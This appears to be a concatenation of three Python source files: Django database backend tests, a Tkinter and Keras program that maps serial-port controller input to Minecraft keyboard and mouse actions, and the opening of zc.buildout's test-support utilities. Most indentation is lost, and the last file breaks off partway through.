args = [(i, i ** 2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
def test_cursor_executemany_with_empty_params_list(self):
#4765: executemany with params=[] does nothing
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
#10320: executemany accepts iterators
args = iter((i, i ** 2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i ** 2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_execute_with_pyformat(self):
#10070: Support pyformat style passing of parameters
args = {'root': 3, 'square': 9}
self.create_squares(args, 'pyformat', multiple=False)
self.assertEqual(models.Square.objects.count(), 1)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat(self):
#10070: Support pyformat style passing of parameters
args = [{'root': i, 'square': i ** 2} for i in range(-5, 6)]
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat_iterator(self):
args = iter({'root': i, 'square': i ** 2} for i in range(-3, 2))
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 5)
args = iter({'root': i, 'square': i ** 2} for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
#6254: fetchone, fetchmany, fetchall return strings as unicode objects
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), ('Clark', 'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [('Jane', 'Doe'), ('John', 'Doe')])
self.assertEqual(list(cursor.fetchall()), [('Mary', 'Agnelline'), ('Peter', 'Parker')])
def test_unicode_password(self):
old_password = connection.settings_dict['PASSWORD']
connection.settings_dict['PASSWORD'] = "françois"
try:
connection.cursor()
except DatabaseError:
# As password is probably wrong, a database exception is expected
pass
except Exception as e:
self.fail("Unexpected error raised with unicode password: %s" % e)
finally:
connection.settings_dict['PASSWORD'] = old_password
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_cached_db_features(self):
self.assertIn(connection.features.supports_transactions, (True, False))
self.assertIn(connection.features.supports_stddev, (True, False))
self.assertIn(connection.features.can_introspect_foreign_keys, (True, False))
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
def test_cursor_contextmanager(self):
"""
Test that cursors can be used as a context manager
"""
with connection.cursor() as cursor:
self.assertTrue(isinstance(cursor, CursorWrapper))
# Both InterfaceError and ProgrammingError seem to be used when
# accessing closed cursor (psycopg2 has InterfaceError, rest seem
# to use ProgrammingError).
with self.assertRaises(connection.features.closed_cursor_error_class):
# cursor should be closed, so no queries should be possible.
cursor.execute("select 1")
@unittest.skipUnless(connection.vendor == 'postgresql',
"Psycopg2 specific cursor.closed attribute needed")
def test_cursor_contextmanager_closing(self):
# There isn't a generic way to test that cursors are closed, but
# psycopg2 offers us a way to check that by closed attribute.
# So, run only on psycopg2 for that reason.
with connection.cursor() as cursor:
self.assertTrue(isinstance(cursor, CursorWrapper))
self.assertTrue(cursor.closed)
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_is_usable_after_database_disconnects(self):
"""
Test that is_usable() doesn't crash when the database disconnects.
Regression for #21553.
"""
# Open a connection to the database.
with connection.cursor():
pass
# Emulate a connection close by the database.
connection._close()
# Even then is_usable() should not raise an exception.
try:
self.assertFalse(connection.is_usable())
finally:
# Clean up the mess created by connection._close(). Since the
# connection is already closed, this crashes on some backends.
try:
connection.close()
except Exception:
pass
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# Instead we verify that, when a constraint is violated, the error raised is
# django.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
available_apps = ['backends']
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a1 = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
a2 = models.Article(headline='This is another test', reporter=self.r,
pub_date=datetime.datetime(2012, 8, 3),
reporter_proxy_id=30)
self.assertRaises(IntegrityError, a2.save)
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a1 = models.Article.objects.get(headline="Test article")
a1.reporter_id = 30
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
# Create another article
r_proxy = models.ReporterProxy.objects.get(pk=self.r.pk)
models.Article.objects.create(headline='Another article',
pub_date=datetime.datetime(1988, 5, 15),
reporter=self.r, reporter_proxy=r_proxy)
        # Retrieve the second article from the DB
a2 = models.Article.objects.get(headline='Another article')
a2.reporter_proxy_id = 30
self.assertRaises(IntegrityError, a2.save)
def test_disable_constraint_checks_manually(self):
"""
        When constraint checks are disabled, it should be possible to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_disable_constraint_checks_context_manager(self):
"""
        When constraint checks are disabled (using the context manager), it should be possible to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
transaction.set_rollback(True)
class ThreadTests(TestCase):
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
connection.cursor()
connections_dict[id(connection)] = connection
def runner():
# Passing django.db.connection between threads doesn't work while
# connections[DEFAULT_DB_ALIAS] does.
from django.db import connections
connection = connections[DEFAULT_DB_ALIAS]
# Allow thread sharing so the connection can be closed by the
# main thread.
connection.allow_thread_sharing = True
connection.cursor()
connections_dict[id(connection)] = connection
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
        # Check that each created connection got a different inner connection.
self.assertEqual(
len(set(conn.connection for conn in connections_dict.values())),
3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
for conn in connections.all():
connections_dict[id(conn)] = conn
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_dict[id(conn)] = conn
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_dict), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except Exception as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(exceptions, [])
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class MySQLPKZeroTests(TestCase):
"""
    Zero as the id for an AutoField should raise an exception in MySQL, because
    MySQL does not allow zero as an autoincrement primary key.
"""
@skipIfDBFeature('allows_auto_pk_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
class DBConstraintTestCase(TransactionTestCase):
available_apps = ['backends']
def test_can_reference_existant(self):
obj = models.Object.objects.create()
ref = models.ObjectReference.objects.create(obj=obj)
self.assertEqual(ref.obj, obj)
ref = models.ObjectReference.objects.get(obj=obj)
self.assertEqual(ref.obj, obj)
def test_can_reference_non_existant(self):
self.assertFalse(models.Object.objects.filter(id=12345).exists())
ref = models.ObjectReference.objects.create(obj_id=12345)
ref_new = models.ObjectReference.objects.get(obj_id=12345)
self.assertEqual(ref, ref_new)
with self.assertRaises(models.Object.DoesNotExist):
ref.obj
def test_many_to_many(self):
obj = models.Object.objects.create()
obj.related_objects.create()
self.assertEqual(models.Object.objects.count(), 2)
self.assertEqual(obj.related_objects.count(), 1)
intermediary_model = models.Object._meta.get_field_by_name("related_objects")[0].rel.through
intermediary_model.objects.create(from_object_id=obj.id, to_object_id=12345)
self.assertEqual(obj.related_objects.count(), 1)
self.assertEqual(intermediary_model.objects.count(), 2)
class BackendUtilTests(TestCase):
def test_format_number(self):
"""
Test the format_number converter utility
"""
def equal(value, max_d, places, result):
self.assertEqual(format_number(Decimal(value), max_d, places), result)
equal('0', 12, 3,
'0.000')
equal('0', 12, 8,
'0.00000000')
equal('1', 12, 9,
'1.000000000')
equal('0.00000000', 12, 8,
'0.00000000')
equal('0.000000004', 12, 8,
'0.00000000')
equal('0.000000008', 12, 8,
'0.00000001')
equal('0.000000000000000000999', 10, 8,
'0.00000000')
equal('0.1234567890', 12, 10,
'0.1234567890')
equal('0.1234567890', 12, 9,
'0.123456789')
equal('0.1234567890', 12, 8,
'0.12345679')
equal('0.1234567890', 12, 5,
'0.12346')
equal('0.1234567890', 12, 3,
'0.123')
equal('0.1234567890', 12, 1,
'0.1')
equal('0.1234567890', 12, 0,
'0')
class DBTestSettingsRenamedTests(IgnoreAllDeprecationWarningsMixin, TestCase):
mismatch_msg = ("Connection 'test-deprecation' has mismatched TEST "
"and TEST_* database settings.")
@classmethod
def setUpClass(cls):
# Silence "UserWarning: Overriding setting DATABASES can lead to
# unexpected behavior."
cls.warning_classes.append(UserWarning)
def setUp(self):
super(DBTestSettingsRenamedTests, self).setUp()
self.handler = ConnectionHandler()
self.db_settings = {'default': {}}
def test_mismatched_database_test_settings_1(self):
# if the TEST setting is used, all TEST_* keys must appear in it.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_NAME': 'foo',
}
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_2(self):
# if the TEST setting is used, all TEST_* keys must match.
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_3(self):
# Verifies the mapping of an aliased key.
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': 'foo'},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_4(self):
# Verifies the mapping of an aliased key when the aliased key is missing.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_old_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': None},
'TEST_CREATE': '',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_new_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': None,
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_matched_test_settings(self):
# should be able to define new settings and the old, if they match
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_new_settings_only(self):
# should be able to define new settings without the old
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_old_settings_only(self):
# should be able to define old settings without the new
self.db_settings.update({
'test-deprecation': {
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_empty_settings(self):
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('default')
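# A minimal sketch (not part of the test suite) of the new-style TEST database
# settings that DBTestSettingsRenamedTests exercises in place of the deprecated
# TEST_* keys; the engine and database names here are illustrative assumptions.
EXAMPLE_DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': 'example.sqlite3',
        # Replaces the old flat TEST_NAME / TEST_CREATE style of key:
        'TEST': {'NAME': 'example_test.sqlite3'},
    },
}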
|
MCHandle.py
|
from tkinter import *
from tkinter import messagebox
from host.BaseComm import BaseComm
import threading
from keras.models import load_model
import time
from host.BaseCtrl import BaseCtrl as ctrl
from host.codemap import VirtualKeyCode
from host.ui_logger import UiLogger
import numpy as np
from PIL import ImageTk, Image, ImageDraw
import multiprocessing
class MCHandle:
ACTION_NONE = '无动作'
ACTION_FORWARD = '前进'
ACTION_JUMP = '起跳'
ACTION_DOWN = '下降'
ACTION_HIT = '打击'
ACTION_PUT = '放置'
ACTIONS = [ACTION_NONE, ACTION_FORWARD, ACTION_JUMP, ACTION_DOWN, ACTION_HIT, ACTION_PUT]
def __init__(self, root=None):
self.init_top = Tk()
self.port_left = 'COM4'
self.port_right = 'COM5'
self.init_bps = StringVar()
self.init_bps.set('115200')
self.init_com_left = StringVar()
self.init_com_left.set(self.port_left)
self.init_com_right = StringVar()
self.init_com_right.set(self.port_right)
self.init_communication()
self.bps = 115200
self.comm = None
self.n = 512
self.select = 24
self.frames = [[0 for i in range(12)] for j in range(self.n)]
self.raw = [[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]] for j in range(self.n)]
        # Build the network
self.model_file = 'mc_actions.h5'
        # Building the network model happens in thread 2
        # Initialize the controller connections
self.comm_left = BaseComm(self.init_com_left.get(), self.bps)
self.comm_right = BaseComm(self.init_com_right.get(), self.bps)
        # Sensitivity
self.sensitivity = 0.3
        # Read a few times first to consume the Init marker
print('预读取:')
for i in range(10):
r1 = self.comm_left.read1epoch()
r2 = self.comm_right.read1epoch()
print(r1, r2)
        # Initialize some values that change at runtime
        # Hook up the UiLogger
print('请保持手柄水平放置不动')
        # Initialize the joystick center values (averaged): X Y X Y
self.ave_left, self.ave_right = [0, 0], [0, 0]
pick = 10
for i in range(pick):
data = self.comm_left.read1epoch()
data_ctrl = data[-4:]
data_ctrl = list(map(int, data_ctrl))
self.ave_left[0] += data_ctrl[2] / pick
self.ave_left[1] += data_ctrl[1] / pick
data = self.comm_right.read1epoch()
data_ctrl = data[-4:]
data_ctrl = list(map(int, data_ctrl))
self.ave_right[0] += data_ctrl[2] / pick
self.ave_right[1] += data_ctrl[1] / pick
print('初始化遥感中点:', self.ave_left, self.ave_right)
self.root = root
if self.root is None:
self.root = Tk()
self.root.title("MC手柄")
self.logger = UiLogger(self.root, height=10, width=32)
self.logger.logger().grid(row=2, column=1, sticky=W+E)
self.panel = Label(self.root)
self.panel.grid(row=1, column=1, sticky=W+E)
self.lock = threading.Lock()
t = threading.Thread(target=self.read_thread)
t.setDaemon(True)
t.start()
t = threading.Thread(target=self.parse_thread)
t.setDaemon(True)
t.start()
def init_communication(self):
top = self.init_top
frame = LabelFrame(top, text="连接设置")
Label(frame, text="左手柄").grid(row=1, column=1)
Entry(frame, textvariable=self.init_com_left).grid(row=1, column=2)
Label(frame, text="右手柄").grid(row=2, column=1)
Entry(frame, textvariable=self.init_com_right).grid(row=2, column=2)
Label(frame, text="波特率").grid(row=3, column=1)
Entry(frame, textvariable=self.init_bps).grid(row=3, column=2)
frame.grid(row=1, columnspan=3, column=1)
Button(top, text="测试", command=self.init_communication_test).grid(row=2, column=1, sticky=W + E)
Button(top, text="刷新", command=self.init_communication_refresh).grid(row=2, column=2, sticky=W + E)
Button(top, text="确定", command=self.init_communication_ok).grid(row=2, column=3, sticky=W + E)
top.mainloop()
def init_communication_ok(self):
try:
bps = int(self.init_bps.get())
except ValueError:
messagebox.showerror("错误", '数值错误!')
return
self.bps = bps
self.port_left = self.init_com_left.get()
self.port_right = self.init_com_right.get()
if self.init_communication_test(show=False) is False:
messagebox.showerror("错误", '手柄测试不通过!')
return
self.init_top.destroy()
def mainloop(self):
self.root.mainloop()
def init_communication_test(self, show=True):
try:
bps = int(self.init_bps.get())
except ValueError:
messagebox.showerror("错误", '数值错误!')
return
res = True
print('测试左手柄')
comm = BaseComm(self.init_com_left.get(), bps)
if not comm.test():
if show is True:
messagebox.showerror("错误", '测试左手柄失败')
res = False
comm.close()
print('测试右手柄')
comm = BaseComm(self.init_com_right.get(), bps)
if not comm.test():
if show is True:
messagebox.showerror("错误", '测试右手柄失败')
res = False
comm.close()
return res
def init_communication_refresh(self):
pass
def draw(self):
width = 1
height = 32
colors = [
'red', 'orange', 'yellow', 'green', 'cyan', 'blue', 'purple',
'red', 'orange', 'yellow', 'green', 'cyan', 'blue', 'purple',
]
size = (width * self.n, height * 6)
im = Image.new("RGB", size, color='white')
draw = ImageDraw.Draw(im)
for i in range(self.n - 2):
for j in range(12):
draw.line((width * i, self.frames[i][j] + size[1] / 2,
width * (i + 1), self.frames[i + 1][j] + size[1] / 2), fill=colors[j])
sx = size[0] - width * self.select
draw.line((sx, 0, sx, size[1]), fill='red')
return im
    # Second thread: reads data from both controllers
def read_thread(self):
while True:
time.sleep(0.01)
data_left = self.comm_left.read1epoch()
data_right = self.comm_right.read1epoch()
self.lock.acquire()
self.raw.append([data_left, data_right])
if len(self.raw) > self.n:
                self.raw = self.raw[1:]  # drop only the oldest sample
self.lock.release()
            # Append the new sample to frames
ann = data_left[0:6]
ann.extend(data_right[0:6])
self.lock.acquire()
self.frames.append(ann)
if len(self.frames) > self.n:
                self.frames = self.frames[1:]  # keep the most recent self.n frames
self.lock.release()
# print('ANN DATA:', ann)
    # Third thread: parses the data and drives keyboard/mouse output
def parse_thread(self):
        # Load the neural network model
model = load_model(self.model_file)
t1, t2 = 0, 0
click = False
key1 = ctrl.ACTION_NONE
key2 = ctrl.ACTION_NONE
jump = ctrl.ACTION_NONE
start = time.time()
while True:
if t1 == 5:
im = self.draw()
imp = ImageTk.PhotoImage(image=im)
self.panel.configure(image=imp)
self.panel.image = imp
t1 = 0
t1 += 1
time.sleep(0.01)
# data_left = self.comm_left.read1epoch()
# data_right = self.comm_right.read1epoch()
self.lock.acquire()
data_left = self.raw[-1][0]
data_right = self.raw[-1][1]
self.lock.release()
            # Right-hand controller handling
right_ctrl = data_right[-4:]
right_ctrl = list(map(int, right_ctrl))
            ctrl.move((right_ctrl[2] - self.ave_right[0]) * self.sensitivity,
                      (right_ctrl[1] - self.ave_right[1]) * self.sensitivity)
if right_ctrl[0] == 0 and click is False:
ctrl.left_down()
click = True
if right_ctrl[0] == 1 and click is True:
ctrl.left_up()
click = False
# Jump
if data_left[6] == 0 and jump == ctrl.ACTION_NONE:
jump = ctrl.ACTION_UP
ctrl.kbd_down(VirtualKeyCode.SPACEBAR)
# ctrl.kbd_click(VirtualKeyCode.SPACEBAR)
if data_left[6] == 1 and jump == ctrl.ACTION_UP:
jump = ctrl.ACTION_NONE
ctrl.kbd_up(VirtualKeyCode.SPACEBAR)
# ctrl.kbd_click(VirtualKeyCode.SPACEBAR)
            # Left-hand controller handling
pos = data_left[-4:][1:3]
# Right
if pos[1] > 800 and key1 == ctrl.ACTION_NONE:
key1 = ctrl.ACTION_D
ctrl.kbd_down(VirtualKeyCode.D_key)
if pos[1] <= 800 and key1 == ctrl.ACTION_D:
key1 = ctrl.ACTION_NONE
ctrl.kbd_up(VirtualKeyCode.D_key)
# Left
if pos[1] < 200 and key1 == ctrl.ACTION_NONE:
key1 = ctrl.ACTION_A
ctrl.kbd_down(VirtualKeyCode.A_key)
if pos[1] >= 200 and key1 == ctrl.ACTION_A:
key1 = ctrl.ACTION_NONE
ctrl.kbd_up(VirtualKeyCode.A_key)
            # W key (move forward)
if pos[0] < 200 and key2 == ctrl.ACTION_NONE:
key2 = ctrl.ACTION_W
ctrl.kbd_down(VirtualKeyCode.W_key)
if pos[0] >= 200 and key2 == ctrl.ACTION_W:
key2 = ctrl.ACTION_NONE
ctrl.kbd_up(VirtualKeyCode.W_key)
            # S key (move backward)
if pos[0] > 800 and key2 == ctrl.ACTION_NONE:
key2 = ctrl.ACTION_S
ctrl.kbd_down(VirtualKeyCode.S_key)
if pos[0] <= 800 and key2 == ctrl.ACTION_S:
key2 = ctrl.ACTION_NONE
ctrl.kbd_up(VirtualKeyCode.S_key)
            # Neural-network action prediction
t2 += 1
            # Only run a prediction every few iterations
if t2 == 15:
t2 = 0
self.lock.acquire()
x = np.array(self.frames[len(self.frames) - self.select:])
self.lock.release()
x = x.reshape((1, x.size))
# print('X shape:', x.shape)
# res = model.train_on_batch(x=x, y=y)
predict = model.predict(x=x)[0]
predict = predict.tolist()
res = predict.index(max(predict))
res = self.ACTIONS[res]
# print('predict:', res)
self.logger.push(UiLogger.Item(UiLogger.LEVEL_INFO, 'predict %.2f' % (time.time() - start), '%s' % res))
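# A standalone sketch (illustrative only, not used by the class above) of how
# parse_thread shapes its model input: the most recent `select` frames of 12
# sensor channels are flattened into a single row of shape (1, select * 12)
# before being passed to model.predict.
def _example_model_input(frames, select=24):
    window = np.array(frames[len(frames) - select:])
    return window.reshape((1, window.size))  # (1, 288) when select == 24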
if __name__ == '__main__':
multiprocessing.freeze_support()
_handle = MCHandle()
_handle.mainloop()
|
testing.py
|
#############################################################################
#
# Copyright (c) 2004-2009 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Various test-support utility functions
"""
try:
# Python 3
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.request import urlopen
except ImportError:
# Python 2
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from urllib2 import urlopen
import errno
import logging
from multiprocessing import Process
import os
import pkg_resources
import random
import re
import shutil
import socket
import subprocess
import sys
import tempfile
import threading
import time
import zc.buildout.buildout
import zc.buildout.easy_install
from zc.buildout.rmtree import rmtree
print_ = zc.buildout.buildout.print_
fsync = getattr(os, 'fsync', lambda fileno: None)
is_win32 = sys.platform == 'win32'
def read(path='out', *rest):
with open(os.path.join(path, *rest)) as f:
return f.read()
def cat(dir, *names):
path = os.path.join(dir, *names)
if (not os.path.exists(path)
and is_win32
and os.path.exists(path+'-script.py')
):
path = path+'-script.py'
with open(path) as f:
print_(f.read(), end='')
def eqs(a, *b):
a = set(a); b = set(b)
return None if a == b else (a - b, b - a)
def clear_here():
for name in os.listdir('.'):
if os.path.isfile(name) or os.path.islink(name):
os.remove(name)
else:
shutil.rmtree(name)
def ls(dir, *subs):
if subs:
dir = os.path.join(dir, *subs)
names = sorted(os.listdir(dir))
for name in names:
# If we're running under coverage, elide coverage files
if os.getenv("COVERAGE_PROCESS_START") and name.startswith('.coverage.'):
continue
if os.path.isdir(os.path.join(dir, name)):
print_('d ', end=' ')
elif os.path.islink(os.path.join(dir, name)):
print_('l ', end=' ')
else:
print_('- ', end=' ')
print_(name)
def mkdir(*path):
os.mkdir(os.path.join(*path))
def remove(*path):
path = os.path.join(*path)
if os.path.isdir(path):
shutil.rmtree(path)
else:
os.remove(path)
def rmdir(*path):
shutil.rmtree(os.path.join(*path))
def write(dir, *args):
path = os.path.join(dir, *(args[:-1]))
f = open(path, 'w')
f.write(args[-1])
f.flush()
fsync(f.fileno())
f.close()
def clean_up_pyc(*path):
base, filename = os.path.join(*path[:-1]), path[-1]
if filename.endswith('.py'):
filename += 'c' # .py -> .pyc
for path in (
os.path.join(base, filename),
os.path.join(base, '__pycache__'),
):
if os.path.isdir(path):
rmdir(path)
elif os.path.exists(path):
remove(path)
## FIXME - check for other platforms
MUST_CLOSE_FDS = not sys.platform.startswith('win')
def system(command, input='', with_exit_code=False):
    # Some TERMinals, especially xterm and its variants, add invisible control
# characters, which we do not want as they mess up doctests. See:
# https://github.com/buildout/buildout/pull/311
# http://bugs.python.org/issue19884
env = dict(os.environ, TERM='dumb')
# Beginning in Python 3.4, 'U' mode to open() is deprecated.
# Python 3.7 changes the way deprecations are shown for main
    # modules, and introduces $PYTHONDEVMODE which turns on warnings in
# more places. If that's done, this leads many of our doctests to
# break; some code path through executing setup.py does this, but
# it's not in our code. Unfortunately, normalizing this printed
# line away doesn't work, it just produces a blank line. We resort
# to turning that warning off.
warnings = env.get('PYTHONWARNINGS', '')
env['PYTHONWARNINGS'] = "ignore:'U' mode is deprecated:DeprecationWarning::," + warnings
p = subprocess.Popen(command,
shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=MUST_CLOSE_FDS,
env=env)
